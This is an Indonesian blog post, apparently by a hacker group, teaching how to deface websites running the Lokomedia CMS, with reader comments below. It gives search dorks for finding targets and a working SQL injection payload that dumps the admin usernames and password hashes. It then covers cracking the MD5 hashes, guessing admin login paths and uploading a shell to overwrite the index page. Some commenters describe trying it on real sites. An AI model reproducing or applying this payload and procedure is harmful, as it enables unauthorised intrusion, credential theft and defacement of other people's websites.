Cara Deface Website Metode SQL Lokomedia
Helloww despenser 2k19 :v, pada kesempatan kali ini, mimin MR.CR0T_D1LU4R akan memberikan sedikit tutorial hacking website atau yang biasa disebut dengan deface. Deface adalah metode hacking dengan cara mengubah tampilan website default menjadi tampilan milik defacer, dan poc atau metode deface pun beragam. Tapi pada tutorial kali ini, admin memberikannya memakai poc atau Teknik SQL Lokomedia.
Tapi sebelum lanjut, bagi kalian yg belum ikutin aktifitas FRI3NDS CYBER ARMY di instagram, bisa langsung follow aja @officialfca
Oke next asu
Website-website Indonesia kebanyakan memakai CMS Lokomedia, jadi teknik atau poc SQL Lokomedia adalah metode yang tepat untuk tebas tu web :v, sebelumnya, ada beberapa alat dan bahan yang perlu kalian siapkan, diantaranya.
Helloww despenser 2k19 :v, pada kesempatan kali ini, mimin MR.CR0T_D1LU4R akan memberikan sedikit tutorial hacking website atau yang biasa disebut dengan deface. Deface adalah metode hacking dengan cara mengubah tampilan website default menjadi tampilan milik defacer, dan poc atau metode deface pun beragam. Tapi pada tutorial kali ini, admin memberikannya memakai poc atau Teknik SQL Lokomedia.
Tapi sebelum lanjut, bagi kalian yg belum ikutin aktifitas FRI3NDS CYBER ARMY di instagram, bisa langsung follow aja @officialfca
Website-website Indonesia kebanyakan memakai CMS Lokomedia, jadi teknik atau poc SQL Lokomedia adalah metode yang tepat untuk tebas tu web :v, sebelumnya, ada beberapa alat dan bahan yang perlu kalian siapkan, diantaranya.
- Dork ( pastinya asu)
- Script Deface (Wajib)
- MD5 Decrypter
- Koneksi Internet (Serah lu ajg :v)
- Kopi (Udud nya jangan lupa :v)
Untuk dork dan scriptnya nanti akan mimin kasih, santuyy simak saja tutorial dibawah ini.
#3. Selanjutnya, akan terlihat sudah username dan password pada "Title" webite itu cuk
#4. Agar akun login website terlihat semua, kalian "View Source" saja atau bisa menekan tombol "CTRL +U" pada perangkat kalian. Cari bagian <title>. Lalu ada username dan passwordnya, tetapi passwordnya masih berbentuk sebuah kode. Kode tersebut akan kita decryptkan.
#5. Copy passwordnya yang berupa kode tersebut, dan pastekan pada MD5 Decrypter di HashKiller Decrypter. Masukan passwordnya, lalu masukan captcha, dan terakhir submit, dan lihat hasil passwordnya pada bagian sebelah kanan.
#6. Selanjutnya, login admin pada website tersebut, untuk loginnya kalian bisa menggunakan beberapa permalink dibawah ini.
Deface Metode SQL Lokomedia
#1. Silahkan dorking dengan search engine, gunakan saja chrome agar lebih fast, untuk dorknya bisa memakai dork dibawah ini.
- inurl:statis-1-pengantar.html
- inurl:statis-1/profil.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
- inurl:kategori-23-hiburan.html
- inurl:/statis-3-profil.html
- inurl:statis-2/visi-dan-misi.html
- Kembangin Lagi Agar Vuln dan Perawan :'v
Nggak tau cara dorking? Mending balik lgi ae lu jadi sperma :v
#2. Setelah itu, kalian akan masuk ke halaman statis pada website tersebut. Silahkan kalian masukan Exploit pada link halaman tersebut, untuk Exploitnya, bisa copas ni cuk
Jika kalian masukan Exploit tersebut pada link websitenya, akan terlihat kaya gini ni asw,
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Jika kalian masukan Exploit tersebut pada link websitenya, akan terlihat kaya gini ni asw,
http://site.com/statis-'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+1-profil.html
#3. Selanjutnya, akan terlihat sudah username dan password pada "Title" webite itu cuk
#4. Agar akun login website terlihat semua, kalian "View Source" saja atau bisa menekan tombol "CTRL +U" pada perangkat kalian. Cari bagian <title>. Lalu ada username dan passwordnya, tetapi passwordnya masih berbentuk sebuah kode. Kode tersebut akan kita decryptkan.
#5. Copy passwordnya yang berupa kode tersebut, dan pastekan pada MD5 Decrypter di HashKiller Decrypter. Masukan passwordnya, lalu masukan captcha, dan terakhir submit, dan lihat hasil passwordnya pada bagian sebelah kanan.
#6. Selanjutnya, login admin pada website tersebut, untuk loginnya kalian bisa menggunakan beberapa permalink dibawah ini.
- http://site.com/admin
- http://site.com/adminweb
- http://site.com/administrator
- http://site.com/redaktur
- http://site.com/cp-admin
- http://site.com/panel
Pilih salah satu halaman login tersebut, jika tidak bisa, cari yang lain, dan jika tidak dapat juga, kalian bisa memakai aplikasi "Admin Login Finder".
#7. Setelah berhasil kalian masuk kedalam halaman admin pada website tersebut, kalian bisa mengakses direktori dan upload shell dan kalian bisa langsung tuntaskan menebas index.
#8 ikutin aktifitas kami di youtube dan instagram
Youtube: Klik disini, MR.CR0T_D1LU4R GANS (Jangan lupa like coment and SUBSCRIBE)
Instagram: @Bangsad420
bocahcoder45.blogspot.com
ReplyDeleteNitip euy hehe
Yeh tuman aso wkwk
DeleteMastah defacer.
ReplyDeleteSungkem ster
Aih berlebihan lu :v
DeleteKe kenal Nick lu asw
ReplyDeletekaga tembus tembus min pas masuk cpanel nya, udah dapet user pass nya, knp ya
ReplyDeletebangke udah nemu username sama pw nya malah kaga ada admin login nya komtol sad bet:(
ReplyDeleteHallo
ReplyDelete